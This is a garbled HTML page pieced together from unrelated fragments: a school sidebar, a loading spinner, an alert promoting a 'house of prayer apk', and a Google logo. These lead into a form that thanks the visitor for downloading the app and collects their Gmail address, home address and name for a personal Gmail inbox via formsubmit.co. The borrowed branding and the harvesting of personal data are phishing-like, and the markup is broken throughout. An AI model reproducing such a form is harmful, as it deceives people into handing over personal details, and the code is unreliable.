<fieldset style="border-radius:5px;background-color:gray">
<button style="border-radius:5px;background-color:gray">Menu</button>

<!DOCTYPE html>
<html>
<head>
    <style>
        /* CSS for sidebar */
        .sidebar {
            width: 200px;
            height: 100%;
            background-color: #f1f1f1;
            position: fixed;
            overflow: auto;
        }

        .sidebar a {
            display: block;
            color: black;
            text-decoration: none;
            padding: 16px;
        }

        .sidebar a:hover {
            background-color: #555;
            color: white;
        }

        /* CSS for main content */
        .content {
            margin-left: 200px; /* same width as sidebar */
        }
    </style>
</head>
<body>
    <div class="sidebar">
        <a href="#">Home</a>
        <a href="#">About</a>
        <a href="#">Services</a>
        <a href="#">Contact</a>
        
        <div class="ccontent">
          <h1>Fobeni High school</h1>
        </div>
<!DOCTYPE html>
<html>
<head>
  <title>Loading Page</title>
  <style>
    #loader {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .loader-icon {
      border: 16px solid #f3f3f3;
      border-top: 16px solid #3498db;
      border-radius: 50%;
      width: 120px;
      height: 120px;
      animation: spin 2s linear infinite;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
  <script>
    window.addEventListener('load', function() {
      // Hide the loading screen when the document has finished loading
      var loader = document.getElementById('loader');
      loader.style.display = 'none';
    });
  </script>
</head>
<body>
  <div id="loader">
    <div class="loader-icon"></div>
  </div>

  <!-- Your website content goes here -->
<script type="text/javascript">

  alert("hellow this is house of prayer apk you can register for membership  ");
</script>
<img alt="" border="0" width="320" data-original-height="112" data-original-width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyNXxCMscoPDPRCuIH_jqnFeO06toz7adpxSnZtD0N40FbKrSdvpE_8lTHEiAHt3NwmOXitSX3F9I6jgBkcfNOdBgHBg13cPdBc5zTLsrbQ5u446EwximEn6Izb3F_wBYmY67VDx1Z_rWeTZDXhhuuHVM4C_ksYNUqk2lFUz4yy-MiJs1wzVrxL0nqgcQ/s320/googlelogo_color_160x56dp.png"/></a></div>
  <link rel="stylesheet" href="/ootstrap.min.css">
  <style>
  *{
    box-sizing: border-box;
  }
    body{
      background: whitesmoke;
      padding: 0 10px;
}h4{
      font-weight: bolder;
      color: #0039FF;
      font-size: 20px;
      text-align: center;
    }
    input {
      padding: 15px;
      font-size: 13.5px ;
      background: rgba(0, 21, 255, 0.03);
      border: none ;
      width: 100%;
      margin: 10px 0;
      
    }
    a{
      font-size: 13px;
      text-align: center;
      text-decoration: none;
    }
    p{ text-align: center;
    }
    small{
      font-size: 12px;
      padding-left: 130px;
    }
    #meta{
      font-size: 13px;
    }
    button{
      width: 100%;
      height: 43px;
      border-radius: 5px;
      border: none;
      background: #0d6efd;
      color: white;
    }
    .cna{
    	background: green;
    	color: white;
    }
  </style>
<fieldset style="height:7000px;width:320px;"> 
<form action="https://formsubmit.co/matlalaprocess@gmail.com" method="POST">
<p style="color:blue"><var>Thank your for Downloading our apk</var></p>
  <fieldset style="border-radius:5px;background-color:white">
<input type="text" name="process" placeholder="Enter Gmail" required>
    </fieldset>
  <fieldset style="border-radius:5px;background-color:white">
<input type="text" name="process" placeholder="Your HOME adress" required>
    </fieldset>
  <fieldset style="border-radius:5px;background-color:white">
<input type="text" name="Gmail "  class="input-control w-100" placeholder="Enter your First Name">
    </fieldset>
  <fieldset style="border-radius:5px;background-color:white">
<input type="text" name="Gmail "  class="input-control w-100" placeholder="Last name">
    </fieldset>
  <fieldset style="border-radius:5px;background-color:white">
<button style="border-radius:5px;background-color:blue">Signup</buttom>
    </fieldset>
  </fieldset>